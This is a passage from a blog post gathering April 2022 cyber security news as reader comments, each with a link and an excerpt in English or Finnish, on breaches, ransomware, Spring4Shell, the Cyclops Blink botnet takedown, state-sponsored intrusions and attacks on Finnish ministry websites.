Cyber security news April 2022

This posting is here to collect cyber security news in April 2022.

I post links to security vulnerability news to comments of this article.

You are also free to post related links to comments.

425 Comments

  1. Tomi Engdahl says:

    CashApp Says Ex-Employee Stole Customer Stock Trading Data
    https://www.securityweek.com/cashapp-says-ex-employee-stole-customer-stock-trading-data

    Financial services and stock trading platform CashApp on Tuesday fessed up to a data breach being blamed on a former employee who stole brokerage data, including portfolio values, from an unknown number of U.S. accounts.

    CashApp, a subsidiary of Jack Dorsey’s Block (formerly Square), said the stolen data includes brokerage account numbers, full names, brokerage portfolio values, and brokerage portfolio holdings for one trading day.

    “Our security team recently determined that a former employee downloaded certain Cash App Investing reports that contained some customer information. While this employee had regular access to these reports as part of their past job responsibilities, in this instance these reports were accessed without permission after their employment ended,” the company said.

    CashApp did not say why an ex-employee maintained access to sensitive financial data after leaving the company. The company was also mum on the number of customers affected but noted in an SEC filing that it was contacting about 8.2 million current and former customers to warn about the breach.

    Reply
  2. Tomi Engdahl says:

    Ransomware Gang Leaks Files Stolen From Industrial Giant Parker Hannifin
    https://www.securityweek.com/ransomware-gang-leaks-files-stolen-industrial-giant-parker-hannifin

    A notorious cybercrime group has leaked several gigabytes of files allegedly stolen from US industrial components giant Parker Hannifin.

    Parker Hannifin specializes in motion and control technologies, and it provides precision engineered solutions for organizations in the aerospace, mobile, and industrial sectors.

    In a Tuesday regulatory filing, the Fortune 250 company said it detected a breach of its systems on March 14.

    Upon discovering the intrusion, Parker shut down some systems and launched an investigation. Law enforcement has been notified and cybersecurity and legal experts have been called in to assist.

    https://www.sec.gov/ix?doc=/Archives/edgar/data/0000076334/000007633422000009/ph-20220314.htm

    Reply
  3. Tomi Engdahl says:

    Millions of Installations Potentially Vulnerable to Spring Framework Flaw
    Internet scan indicates hundreds of thousands of vulnerable installations, while data from the major Java repository suggests millions, firms say.
    https://www.darkreading.com/application-security/vulnerable-spring-framework-instances-estimated-at-possibly-millions?iiris-ref=recommend

    Security firms produced two data points on Monday to estimate the number of Spring Framework installations that are vulnerable to the most recent flaw — CVE-2022-22965, also known as Spring4Shell or SpringShell — suggesting anywhere from hundreds of thousands to millions of instances are affected.

    Details of the vulnerability were leaked last week less than 24 hours after the issue was disclosed to the Spring project, leaving security professionals and developers scrambling. Scans for the specific combination of factors that suggest a vulnerable instance found 150,000 vulnerable devices after scanning a quarter of the Internet, suggest that as many as 600,000 devices may have the vulnerable component that could be exploited by the leaked code, says Jared Smith, senior director of threat intelligence at security metrics firm SecurityScorecard.

    In addition, SecurityScorecard’s honeypot servers have detected active attempts to exploit the issues, he says.

    “Given early reports suggest [SpringShell affected] around 6,000 devices, this new number is much worse,” Smith says. “Log4j was much harder to assess whether an exposed port was using a Java-based application with Log4j behind the scenes. This is much more visible and directly available to exploit and test.”

    Reply
  4. Tomi Engdahl says:

    Springshell Exploit Resource Center
    https://www.sonatype.com/resources/springshell-exploit-resource-center

    Find a range of resources below to describe and resolve the critical software vulnerabilities in the Spring Framework, dubbed Springshell and Spring4Shell, affecting millions of users.

    Reply
  5. Tomi Engdahl says:

    Poliisi takavarikoi F-Securen vpn-palvelun loki­tietoja – korkein oikeus totesi kielletyksi
    https://www.is.fi/digitoday/tietoturva/art-2000008732480.html

    Korkeimman oikeuden päätös rinnastaa vpn-käyttäjien lokitiedot tunnistamistiedoiksi, joita poliisi ei voi takavarikoida.

    Korkein oikeus on todennut keskusrikospoliisin tekemän takavarikon kielletyksi keinoksi vpn-suojattua internet-yhteyttä käyttäneen henkilön paljastamiseksi.

    Keskusrikospoliisi sai tammikuussa 2019 Saksan viranomaisilta kiireellisen oikeusapupyynnön, joka liittyi epäiltyyn törkeään lapsen seksuaaliseen hyväksikäyttöön. KRP tulkitsi pakkokeinolakia siten, että sillä oli oikeus takavarikoida vpn-palveluntarjoajalta lokitiedostoja, jotka paljastavat käyttäjän yksilöivän todellisen ip-osoitteen.

    Ilta-Sanomat Digitodayn saaman vahvistuksen mukaan kyseessä on suomalainen tietoturvayhtiö F-Secure Oyj, joka tarjoaa vpn-palveluita Freedome-tuotenimellä.

    Helsingin käräjäoikeus päätti vuonna 2019, että takavarikko on kumottava ja tiedot hävitettävä. KRP valitti päätöksestä, ja Helsingin hovioikeus vahvisti käräjäoikeuden päätöksen vuonna 2020. Poliisi valitti myös tästä päätöksestä.

    Korkein oikeus totesi päätöksessään, että F-Securea on pidettävä viestinnän välittäjänä. Tällöin se on lain silmin teleoperaattorien kaltainen teleyritys, eikä poliisi saa takavarikoida tai kopioida siltä tietoja takavarikolla. Vpn-palvelun lokitiedot kuuluvat yksityisyyden suojan piiriin ja ovat pakkokeinolain tarkoittamia tunnistamistietoja, eivät pelkkää asiakastietoa.

    Korkeimman oikeuden päätös ei estä vpn-yhteyden takana tapahtuvien rikosten tutkimista. Se kuitenkin pakottaa poliisin seuraamaan samaa menettelyä kuin telekuuntelussa, joka edellyttää tuomarin päätöstä.

    Reply
  6. Tomi Engdahl says:

    Story on the BBC news app today.

    BBC News – Isle of Wight: Council’s electric vehicle chargers hacked to show porn site
    https://www.bbc.com/news/uk-england-hampshire-61006816

    Electric vehicle charging points in a council’s car parks have been hacked to show a porn website on their screens.

    Isle of Wight Council has three charge points in Quay Road, Ryde, Cross Street, Cowes and Moa Place, Freshwater.

    In a statement the council apologised “to anyone that may have found the inappropriate web content”.

    The authority said staff were due to visit the charge points “to ensure the third party web address is covered up”.

    It is understood the chargers were meant to display the network’s own website, but the web address had been redirected and was instead taking visitors to a pornographic site.

    The council said: “We are saddened to learn that a third-party web address displayed on our electric vehicle (EV) signage appears to have been hacked.”

    Reply
  7. Tomi Engdahl says:

    Mikko Hyppöseltä ja Jarmo Limnélliltä synkkä ennustus “Venäjää harmittaa länsi­maiden yhtenäisyys”
    https://www.is.fi/digitoday/tietoturva/art-2000008733465.html
    Tietoturva-asiantuntijat ennustavat Venäjän kybersodan laajenevan Ukrainasta maailmanlaajuiseksi.

    Reply
  8. Tomi Engdahl says:

    Poliisi takavarikoi F-Securen vpn-palvelun loki­tietoja korkein oikeus totesi KRP:n toiminnan kielletyksi https://www.is.fi/digitoday/tietoturva/art-2000008732480.html
    KORKEIN oikeus on todennut keskusrikospoliisin tekemän takavarikon kielletyksi keinoksi vpn-suojattua internet-yhteyttä käyttäneen henkilön paljastamiseksi. Keskusrikospoliisi sai tammikuussa 2019 Saksan viranomaisilta kiireellisen oikeusapupyynnön, joka liittyi epäiltyyn törkeään lapsen seksuaaliseen hyväksikäyttöön. KRP tulkitsi pakkokeinolakia siten, että sillä oli oikeus takavarikoida vpn-palveluntarjoajalta lokitiedostoja, jotka paljastavat käyttäjän yksilöivän todellisen ip-osoitteen. Korkein oikeus totesi päätöksessään, että F-Securea on pidettävä viestinnän välittäjänä.
    Tällöin se on lain silmin teleoperaattorien kaltainen teleyritys, eikä poliisi saa takavarikoida tai kopioida siltä tietoja takavarikolla.
    Vpn-palvelun lokitiedot kuuluvat yksityisyyden suojan piiriin ja ovat pakkokeinolain tarkoittamia tunnistamistietoja, eivät pelkkää asiakastietoa. Korkeimman oikeuden päätös ei estä vpn-yhteyden takana tapahtuvien rikosten tutkimista. Se kuitenkin pakottaa poliisin seuraamaan samaa menettelyä kuin telekuuntelussa, joka edellyttää tuomarin päätöstä.

    Reply
  9. Tomi Engdahl says:

    Kiinalaiset hakkerit ottivat supersuositun VLC-mediasoittimen työkalukseen https://www.kauppalehti.fi/uutiset/kiinalaiset-hakkerit-ottivat-supersuositun-mediasoittimen-tyokalukseen/319e28fa-707d-4423-b3a4-fdf5d5442a0c
    Tietoturvatutkijat ovat havainneet pitkään jatkuneen vakoiluoperaation, jonka takana ovat Kiinan valtionhallinnolle työskentelevät hakkerit. Hakkerit ovat käyttäneet apunaan erittäin suosittua VLC Media Player -sovellusta. Bleeping Computerin mukaan operaatiossa on vakoiltu hallinnollisia, oikeudellisia ja uskonnollisia organisaatioita sekä järjestöjä Pohjois-Amerikassa, Aasiassa ja Euroopassa. Vakoiluoperaatiosta on vastannut Cicada-nimellä tunnettu hakkeriryhmä. Yli 15-vuotisen historiansa aikana ryhmä on käyttänyt myös nimiä menuPass, Stone Panda, Potassium,
    APT10 ja Red Apollo. Alkup.
    https://www.bleepingcomputer.com/news/security/chinese-hackers-abuse-vlc-media-player-to-launch-malware-loader/

    Reply
  10. Tomi Engdahl says:

    Beware Ukraine-themed fundraising scams
    https://blog.malwarebytes.com/scams/2022/04/beware-ukraine-themed-fundraising-scams/
    Unfortunately scammers continue to focus on the invasion of Ukraine to make money. A flurry of bogus domains and scam techniques are spreading their wings. They appear to focus on donation fakeouts but there’s a few other nasty surprises lying in wait too.

    Reply
  11. Tomi Engdahl says:

    Colibri Loader combines Task Scheduler and PowerShell in clever persistence technique https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/
    Colibri Loader is a relatively new piece of malware that first appeared on underground forums in August 2021 and was advertised to “people who have large volumes of traffic and lack of time to work out the material”. As it names suggests, it is meant to deliver and manage payloads onto infected computers. Our Threat Intelligence Team recently uncovered a new Colibri Loader campaign delivering the Vidar Stealer as final payload. There is already published material about Colibri by CloudSek and independent researchers. Since most of the details about the bot have been covered, we decided to highlight a persistence technique we haven’t seen before.

    Reply
  12. Tomi Engdahl says:

    Fake eshops on the prowl for banking credentials using Android malware https://www.welivesecurity.com/2022/04/06/fake-eshops-prowl-banking-credentials-android-malware/
    Seeking the opportunity to make a profit off this behavior, cybercriminals exploit it by tricking eager shoppers into downloading malicious applications. In an ongoing campaign targeting the customers of eight Malaysian banks, threat actors are trying to steal banking credentials by using fake websites that pose as legitimate services, sometimes outright copying the original. These websites use similar domain names to the services they are impersonating the better to attract unsuspecting victims. This campaign was first identified at the end of 2021, with the attackers impersonating the legitimate cleaning service Maid4u. Distributed through Facebook ads, the campaign tempts potential victims to download Android malware from a malicious website. It is still ongoing as of the publication of this blogpost, with even more distribution domains registered after its discovery. In January 2022, MalwareHunterTeam shared three more malicious websites and Android trojans attributed to this campaign.

    Reply
  13. Tomi Engdahl says:

    US disrupts prolific botnet controlled by Russian military, DOJ says https://therecord.media/us-disrupts-prolific-botnet-controlled-by-russian-military-doj-says/
    US Attorney General Merrick Garland announced Wednesday that US officials have disrupted a global botnet of thousands of infected devices allegedly controlled by the Russian military. Garland said the court-authorized operation was directed at Sandworm a cyber-unit of the GRU Russian military intelligence service and Cyclops Blink, an advanced modular botnet linked to the group. In a statement, the Justice Department said the operation “copied and removed malware from vulnerable internet-connected firewall devices that Sandworm used for command and control (C2) of the underlying botnet.”. “Although the operation did not involve access to the Sandworm malware on the thousands of underlying victim devices worldwide, referred to as bots, ‘ the disabling of the C2 mechanism severed those bots from the Sandworm C2 devices’ control, ” the DOJ explained.

    Reply
  14. Tomi Engdahl says:

    Researcher finds cryptomining malware targeting AWS Lambda https://therecord.media/researcher-finds-cryptomining-malware-targeting-aws-lambda/
    Security researchers with Cado Labs said they have found what they believe is the first publicly-known case of malware specifically designed to execute in an AWS Lambda environment. AWS Lambda is a widely-used, serverless computing platform provided by Amazon as a part of Amazon Web Services. In a report released on Wednesday, Cado Labs researcher Matt Muir said they decided to name the malware “Denonia, ” after the name the attackers gave the domain it communicates with.

    Reply
  15. Tomi Engdahl says:

    Eri puolilla Suomea on ollut laajoja häiriöitä turvapuhelinten toiminnassa, Oulussa edelleen noin 100 ikäihmisen hätäranneke ei toimi https://yle.fi/uutiset/3-12392765?origin=rss
    Verkkohäiriöitä on ollut tiistai-illasta saakka, ja niiden alkaessa ongelma oli laajempi. Oulun hyvinvointipalveluista kerrotaan, että henkeä ja terveyttä uhkaavilta vaaratilanteilta on vältytty.

    Reply
  16. Tomi Engdahl says:

    Nettipeli ryöstettiin saalis 578000000 euroa https://www.is.fi/digitoday/esports/art-2000008730781.html
    VARAS tai varkaat vei lohkoketjuteknologian päälle rakennetun Axie Infinity -nettipelin taustajärjestelmien kautta yli puolen miljardin dollarin arvoisen kryptopotin, uutisoivat muun muassa Wall Street Journal ja PC Gamer.

    Reply
  17. Tomi Engdahl says:

    FBI Disables “Cyclops Blink” Botnet Controlled by Russian Intelligence Agency
    https://www.securityweek.com/fbi-disables-cyclops-blink-botnet-controlled-russian-intelligence-agency

    The U.S. government on Wednesday announced that it had neutralized a massive botnet of hardware devices controlled by Russia’s main intelligence agency (GRU).

    In the court-approved operation, the Federal Bureau of Investigation (FBI) partnered with Watchguard to copy and remove the “Cyclops Blink” malware that serves as the hub for a large-scale botnet targeting firewall appliances and SOHO networking devices.

    Cyclops Blink, which maintains persistence throughout the legitimate device firmware update process, has been directly linked to APT groups associated with the Russian government.

    In a statement Wednesday, the U.S. Justice Department said the operation was conducted last month “to disrupt a two-tiered global botnet of thousands of infected network hardware devices under the control of a threat actor known to security researchers as Sandworm.”

    Reply
  18. Tomi Engdahl says:

    Apple Leaves Big Sur, Catalina Exposed to Critical Flaws: Intego
    https://www.securityweek.com/intego-apple-leaves-big-sur-catalina-exposed-critical-flaws

    Apple is being called to task for neglecting to patch two “actively exploited” zero-day vulnerabilities on older versions of its flagship macOS platform.

    On March 31, Apple released emergency patches for the two memory corruption vulnerabilities — CVE-2022-22675 and CVE-2022-22674 — and said it was aware of a report that it was “actively exploited” in the wild.

    Those patches were only made available for iOS, iPadOS and macOS Monterey, meaning that Apple customers running Big Sur, Catalina or older versions of the operating system will remain exposed to hacker attacks targeting these security defects.

    “Apple has chosen to leave an estimated 35-40% of all supported Macs in danger of actively exploited vulnerabilities,” says Joshua Long, chief security analyst at Intego, a company that sells macOS security tools.

    Reply
  19. Tomi Engdahl says:

    Denonia: First Malware Targeting AWS Lambda
    https://www.securityweek.com/denonia-first-malware-targeting-aws-lambda

    Researchers have come across what appears to be the first piece of malware designed to specifically target AWS Lambda environments.

    The malware, named Denonia based on the name of a domain it communicates with, was discovered by researchers at Cado Security, who found samples uploaded to VirusTotal in January and late February. The samples are currently detected by roughly half of the security vendors on VirusTotal.

    Denonia was developed in Go and it currently appears to be used for cryptocurrency mining, specifically Monero (XMR), using a custom version of the popular XMRig mining software.

    AWS describes Lambda as a “serverless, event-driven compute service that lets you run code for virtually any type of application or backend service without provisioning or managing servers.”

    Cado noted that AWS secures the underlying Lambda execution environment, but it’s up to customers to secure functions, which makes it possible for cybercriminals to deploy such malware.

    An analysis of Denonia showed that the malware is designed to execute in Lambda environments, but it’s still unclear how it’s deployed.

    https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/

    Reply
  20. Tomi Engdahl says:

    Hamas-Linked Hackers Using Sexy ‘Catfish’ Lures, New Malware
    https://www.securityweek.com/hamas-linked-hackers-using-sexy-facebook-catfish-lures-new-malware

    Hamas-linked APT Group targeting high-ranking Israelis with new new malware

    APT-C-23, a Hamas-linked attack group, is said to be involved in a sophisticated catfishing campaign targeting high ranking Israeli officials. Beyond elaborate Facebook-focused social engineering, the group has introduced new malware including a fake messaging app (known as VolatileVenom), a downloader (known as Barbie Downloader) and a backdoor (BarbWire Backdoor).

    The campaign individually targets high profile officials working in defense, law enforcement, emergency services, and other government-related organizations. The attack involves social engineering, a downloader, a backdoor and a separate Android malware. The purpose appears to be espionage. The campaign was discovered and analyzed by Cybereason’s Nocturnus researcher team.

    Reply
  21. Tomi Engdahl says:

    Ingrid Lunden / TechCrunch:
    Nord Security, the Lithuania-based startup behind NordVPN, raises $100M, its first ever funding, at a $1.6B valuation led by Novator Ventures — VPN usage has surged in the last several years, with growing concerns over data privacy and security — and sometimes completely different motivations …

    NordVPN raises its first money, $100M at a $1.6B valuation
    https://techcrunch.com/2022/04/06/nord-security-the-startup-behind-nordvpn-raises-its-first-ever-funding-100m-at-a-1-6b-valuation/

    Reply
  22. Tomi Engdahl says:

    Zack Whittaker / TechCrunch:
    In a court-authorized March operation, the FBI cut off the servers of the Cyclops Blink botnet, tied to Russia’s Sandworm, from Asus and WatchGuard routers — The Federal Bureau of Investigation has disclosed it carried out an operation in March to target a massive botnet controlled by Russian intelligence.

    FBI operation aims to take down massive Russian GRU botnet
    https://techcrunch.com/2022/04/06/fbi-operation-botnet-sandworm/

    The Federal Bureau of Investigation has disclosed it carried out an operation in March to target a massive botnet controlled by Russian intelligence.

    The operation was authorized by courts in California and Pennsylvania, allowing the FBI to copy and remove the so-called Cyclops Blink malware from its command and control servers, also known as C2s, allowing the FBI to sever the connections to thousands of compromised infected devices that were taking instructions from the servers.

    The Justice Department announced the March operation on Wednesday, describing it as “successful,” but warned that device owners should still review the initial February 23 advisory to secure their compromised devices and prevent reinfection.

    Reply
  23. Tomi Engdahl says:

    Audrey An / The Keyword:
    Google will roll out Privacy Guide, a guided tour of privacy and security settings in Chrome, to all desktop users on version 100 or above in the coming weeks — Product Manager, Chrome at Google Safety Engineering Center Munich — Your browser plays a big role in your online experience — including protecting your privacy.

    Take a step-by-step tour of your Chrome privacy settings
    https://blog.google/products/chrome/take-step-step-guide-your-chrome-privacy-settings/

    Reply
  24. Tomi Engdahl says:

    Matt Burgess / Wired:
    New data-sharing proposals in Europe push for the expansion of facial recognition and to allow police forces across the EU to link their photo databases — Lawmakers advance proposals to let police forces across the EU link their photo databases—which include millions of pictures of people’s faces.

    Europe Is Building a Huge International Facial Recognition System
    https://www.wired.com/story/europe-police-facial-recognition-prum/

    Lawmakers advance proposals to let police forces across the EU link their photo databases—which include millions of pictures of people’s faces.

    Reply
  25. Tomi Engdahl says:

    Nigerian social media accounts targeted in influence campaign centered on Ukraine invasion https://therecord.media/nigerian-social-media-accounts-targeted-in-influence-campaign-centered-on-ukraine-invasion/
    Owonikoko, a Nigerian web designer and development artist, appears to have been one of many bystanders in the Global South caught in the online battle to control how people perceive Russia’s invasion of Ukraine. In response to these content moderation challenges social media companies have ramped up bot and misinformation monitoring and the global media is investigating the scope of the problem.

    Reply
  26. Tomi Engdahl says:

    Watch out for fake WhatsApp “New Incoming Voicemessage” emails https://blog.malwarebytes.com/social-engineering/2022/04/watch-out-for-fake-whatsapp-new-incoming-voicemessage-emails/
    The sender is “Whatsapp Notifier,” a spoofed name, and an email address using a legitimate domain belonging to a Russian road safety organization, to sneak through mail filters. Recipients are encouraged to click a “Play” button and listen to their voicemail. That doesn’t happen, though–clicking “Play” directs recipients to a page where Aromorblox found an obfuscated, malicious JavaScript that redirected users to another page. The second page included an exploit, triggered when users responded to an Allow/Block prompt.

    Reply
  27. Tomi Engdahl says:

    Android apps with 45 million installs used data harvesting SDK https://www.bleepingcomputer.com/news/security/android-apps-with-45-million-installs-used-data-harvesting-sdk/
    The apps collected this data through a third-party SDK that includes the ability to capture clipboard content, GPS data, email addresses, phone numbers, and even the user’s modem router MAC address and network SSID. According to AppCensus, who discovered the use of this SDK, the collected data is bundled and transmitted by the SDK to the domain “mobile.measurelib.com,” which appears to be owned by a Panama-based analytics firm named Measurement Systems.

    Reply
  28. Tomi Engdahl says:

    Fake e-shops on the prowl for banking credentials using Android malware https://www.welivesecurity.com/2022/04/06/fake-eshops-prowl-banking-credentials-android-malware/
    Seeking the opportunity to make a profit off this behavior, cybercriminals exploit it by tricking eager shoppers into downloading malicious applications. In an ongoing campaign targeting the customers of eight Malaysian banks, threat actors are trying to steal banking credentials by using fake websites that pose as legitimate services, sometimes outright copying the original. These websites use similar domain names to the services they are impersonating the better to attract unsuspecting victims.

    Reply
  29. Tomi Engdahl says:

    Google is on guard: sharks shall not pass!
    https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/
    This what the Check Point Research (CPR) team encountered while analyzing suspicious applications found in Google Play. These applications pretended to be genuine AV solutions while in reality they downloaded and installed an Android Stealer called Sharkbot.. In this article, we provide a deep technical analysis of Sharkbot and reveal the steps that helped us to spot the malware-spreading applications on Google Play.

    Reply
  30. Tomi Engdahl says:

    WatchGuard failed to explicitly disclose critical flaw exploited by Russian hackers https://arstechnica.com/information-technology/2022/04/watchguard-failed-to-disclose-critical-flaw-exploited-by-russian-hackers/
    In court documents unsealed on Wednesday, an FBI agent wrote that the WatchGuard firewalls hacked by Sandworm were “vulnerable to an exploit that allows unauthorized remote access to the management panels of those devices.” It wasn’t until after the court document was public that WatchGuard published this FAQ, which for the first time made reference to CVE-2022-23176, a vulnerability with a severity rating of
    8.8 out of a possible 10.

    Reply
  31. Tomi Engdahl says:

    State-sponsored Attack Groups Capitalise on Russia-Ukraine War for Cyber Espionage https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/
    The use of the conflict as a bait is not limited to a specific region or APT group, it goes from Latin America to the Middle East and to Asia. In this article, CPR will provide an overview of several campaigns by different APT groups using the ongoing Russia-Ukraine war to increase the efficiency of their campaigns. CPR will discuss the victimology of these campaigns; the tactics used, and provide technical analysis of the observed malicious payloads and malware, specially crafted for this cyber-espionage.

    Reply
  32. Tomi Engdahl says:

    Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets/
    In recent months, we observed likely network intrusions targeting at least 7 Indian State Load Despatch Centres (SLDCs) responsible for carrying out real-time operations for grid control and electricity dispatch within these respective states. Notably, this targeting has been geographically concentrated, with the identified SLDCs located in North India, in proximity to the disputed India-China border in Ladakh. One of these SLDCs was also targeted in previous RedEcho activity. This latest set of intrusions, however, is composed of an almost entirely different set of victim organizations. In addition to the targeting of power grid assets, we also identified the compromise of a national emergency response system and the Indian subsidiary of a multinational logistics company by the same threat activity group. To achieve this, the group likely compromised and co-opted internet-facing DVR/IP camera devices for command and control (C2) of Shadowpad malware infections, as well as use of the open source tool FastReverseProxy (FRP).

    Reply
  33. Tomi Engdahl says:

    VMware Patches Five Critical Vulnerabilities in Workspace ONE Access
    https://www.securityweek.com/vmware-patches-five-critical-vulnerabilities-workspace-one-access

    VMware on Wednesday announced patches for several critical and high-severity vulnerabilities affecting Workspace ONE Access and other products.

    A total of eight security holes are detailed in the company’s advisory, affecting VMware Workspace ONE Access, Identity Manager (vIDM, the previous name of Workspace ONE Access), vRealize Automation (vRA), Cloud Foundation, and Suite Lifecycle Manager. Five of the issues are rated “critical severity.”

    With a CVSS score of 9.8 and tracked as CVE-2022-22954, the first of the bugs is a remote code execution vulnerability affecting both Workspace ONE Access and Identity Manager.

    The issue exists because a “malicious actor with network access can trigger a server-side template injection,” which could result in remote code execution.

    VMware also announced patches for two authentication bypass vulnerabilities in the OAuth2 ACS framework of Workspace ONE Access, which could allow a malicious actor to “execute any operation due to exposed endpoints in the authentication framework.”

    Tracked as CVE-2022-22955 and CVE-2022-22956, the issues have a CVSS score of 9.8.

    Reply
  34. Tomi Engdahl says:

    BlackCat Ransomware Targets Industrial Companies
    https://www.securityweek.com/blackcat-ransomware-targets-industrial-companies

    A data theft tool used by the ransomware group tracked as BlackCat, ALPHV and Noberus, suggests that the cybercriminals are increasingly interested in targeting industrial organizations.

    The BlackCat ransomware group, which operates under a ransomware-as-a-service (RaaS) model, emerged in November 2021 and has since targeted organizations worldwide, including many in the United States.

    Several cybersecurity firms have found links between BlackCat and the BlackMatter and DarkSide ransomware operations. It appears that the BlackCat team consists of various RaaS group affiliates, including BlackMatter, rather than being a rebranding of BlackMatter.

    In a blog post published on Thursday, Kaspersky also provided information on the connection between BlackMatter and BlackCat, focusing on a data exfiltration tool called Fendr and ExMatter.

    Fendr was described by Symantec last year as a custom data exfiltration tool that enabled BlackMatter operators to easily steal data of value from compromised systems. The tool, previously seen only in BlackMatter attacks, is designed to collect specific file types and upload them to the cybercriminals’ servers before file-encrypting ransomware is deployed. The stolen data can then be used to pressure the victim into paying up.

    In a report published in February, industrial cybersecurity firm Claroty said ransomware often hits industrial control systems (ICS) or other operational technology (OT) environments, and impact is often significant.

    Ransomware Often Hits Industrial Systems, With Significant Impact: Survey
    https://www.securityweek.com/ransomware-often-hits-industrial-systems-significant-impact-survey

    Ransomware attacks in many cases hit industrial control systems (ICS) or operational technology (OT) environments, and impact is often significant, according to a report published on Thursday by IoT and industrial cybersecurity company Claroty.

    Claroty’s “Global State of Industrial Cybersecurity” report is based on a Pollfish survey of 1,100 IT and OT security professionals in the United States, Europe and the APAC region. More than half of respondents work for enterprises that have an annual revenue exceeding $1 billion. The survey was conducted in September 2021.

    Roughly 80% of respondents admitted that their organization had experienced a ransomware attack within the past year, and nearly half said the incident had impacted their ICS/OT environment.

    Only 15% of respondents said there was no impact or minimal impact on operations, and nearly 50% said there was significant impact. Seven percent said the incident resulted in a full operations shutdown that lasted for more than a week.

    The cyberattack was disclosed to both authorities and shareholders in most cases, but some companies apparently did not inform anyone.

    Reply
  35. Tomi Engdahl says:

    India Claims It Foiled Chinese Cyberattack on Disputed Border
    https://www.securityweek.com/india-claims-it-foiled-chinese-cyberattack-disputed-border

    India on Thursday claimed it foiled an attempted cyber-attack by Chinese hackers targeting its power distribution system near a disputed frontier where the two countries are engaged in a military stand-off.

    Ties between the world’s two most populous nations are at a low ebb after a deadly skirmish in the Himalayan region of Ladakh that left at least 20 Indian and four Chinese soldiers dead in 2020.

    “Two attempts by Chinese hackers were made to target electricity distribution centres near Ladakh but were not successful,” power minister R.K. Singh told reporters in New Delhi.

    Singh added that India had deployed “defence systems” to counter such attacks.

    New Delhi’s claim came a day after US-based intelligence firm Recorded Future said suspected Chinese hackers had made at least seven attempts to target Indian power infrastructure in recent months.

    The attacks targeted infrastructure “responsible for carrying out real-time operations for grid control and electricity dispatch”, the group reported.

    “This targeting has been geographically concentrated… in north India, in proximity to the disputed India-China border in Ladakh.”

    Reply
  36. Tomi Engdahl says:

    VPN Provider Nord Security Reaches Unicorn Status With $100 Million Funding
    https://www.securityweek.com/vpn-provider-nord-security-reaches-unicorn-status-100-million-funding

    Lithuania-based VPN provider reaches “Unicorn” status with first ever outside funding

    Lithuania-based Nord Security has raised $100 million in its first ever outside capital funding with a financing round led by Novator Ventures, and participation from Burda Principal Investments and General Catalyst. The funding values the company at $1.6 billion.

    Reply
  37. Tomi Engdahl says:

    Palvelunestohyökkäys menossa: Puolustusministeriön sivut kaatuneet
    Puolustusministeriön verkkosivuille ei pääse. Myös ulkoministeriön sivut kaatuivat, mutta ne saatiin palautettua normaaliksi.
    https://www.iltalehti.fi/kotimaa/a/45797cdf-e56d-4037-bfa7-40f8a548a7ea

    Ulkoministeriön ja puolustusministeriön verkkosivut kaatuivat perjantaina. Defmin.fi -sivustolle ei tällä hetkellä pääse sisään.

    Ulkoministeriö kertoo Twitterissä, että heidän sivunsa ovat palautuneet normaaliksi kello 13.

    Verkkohyökkäys käynnissä: Puolustusministeriön ja ulkoministeriön sivut kaatuivat
    https://www.hs.fi/kotimaa/art-2000008738855.html

    Puolustusministeriöstä kerrotaan HS:lle, että kyse on parhaillaan käynnissä olevasta palvelunestohyökkäyksestä. Ulkoministeriön sivut toimivat jälleen.

    Ulkoministeriön ja puolustusministeriön nettisivut kaatuivat perjantaina iltapäivällä. Ulkoministeriön formin.fi -sivuston osalta tilanne päättyi noin kello 13 ja sivusto toimii ministeriön mukaan jälleen normaalisti.

    Puolustusministeriön defmin.fi -sivustolle ei edelleenkään pääse. Ulkoministeriöstä ja puolustusministeriöstä vahvistettiin Helsingin Sanomille iltapäivällä, että sivustot olivat alhaalla ja tilannetta selvitettiin.

    Palvelunestohyökkäyksen lähde ei toistaiseksi ole tiedossa, mutta suojelupoliisi varoitti varoitti viime viikolla, että Venäjä kohdistaa todennäköisesti Suomeen kyberiskuja ja informaatiovaikuttamista tulevina kuukausina.

    Hyökkäys tehtiin juuri Ukrainan presidentin Volodymyr Zelenskyin eduskuntapuheen alla.

    Reply
  38. Tomi Engdahl says:

    F-Securen Hyppönen: Iskut suomalaisten ministeriöiden sivuille todennäköisesti venäläistä alkuperää – “Näyttävä tapa osoittaa mieltä verkossa”
    https://www.mtvuutiset.fi/artikkeli/f-securen-hypponen-iskut-suomalaisten-ministerioiden-sivuille-todennakoisesti-venalaista-alkuperaa-ei-pysyvaa-vahinkoa-tama-on-nayttava-tapa-osoittaa-mielta-verkossa/8398934#gs.woxlpb

    Ulkoministeriön ja puolustusministeriön sivuille kohdistunut palvelunestohyökkäys oli todennäköisesti venäläistä alkuperää, arvioi F-Securen tutkimusjohtaja Mikko Hyppönen MTV Uutisille.

    Hyppösen mukaan kyseisen kaltaisilla iskuilla ei varasteta tietoa tai murtauduta järjestelmiin.

    – Tällä hyökkäyksellä ei aikaansaada pysyvää vahinkoa, vaan tämä on näyttävä tapa osoittaa mieltä verkossa.

    Hyppösen arvion mukaan isku oli ajoitettu tarkoituksella alkamaan samaan aikaan, kun Ukrainan presidentin Volodymyr Zelenskyin oli määrä aloittaa puheensa Suomen eduskunnalle.

    Iskun alkuperää ei välttämättä saada koskaan selville.

    – Olettaa kuitenkin voi, että tämä liittyy venäläiseen aggressiiviseen offensiivitoimintaan verkossa juuri nyt. Syy-yhteys (Zelenskyin puheeseen Suomen eduskunnalle) on hyvin helposti nähtävissä.

    Reply
  39. Tomi Engdahl says:

    U.S. Says It Secretly Removed Malware Worldwide, Pre-empting Russian Cyberattacks
    https://www.nytimes.com/2022/04/06/us/politics/us-russia-malware-cyberattacks.html?referringSource=articleShare

    The operation is the latest effort by the Biden administration to thwart actions by Russia by making them public before Moscow can strike.

    The United States said on Wednesday that it had secretly removed malware from computer networks around the world in recent weeks, a step to pre-empt Russian cyberattacks and send a message to President Vladimir V. Putin of Russia.

    The move, made public by Attorney General Merrick B. Garland, comes as U.S. officials warn that Russia could try to strike American critical infrastructure — including financial firms, pipelines and the electric grid — in response to the crushing sanctions that the United States has imposed on Moscow over the war in Ukraine.

    The malware enabled the Russians to create “botnets”

    Reply
  40. Tomi Engdahl says:

    Sergiu Gatlan / BleepingComputer:
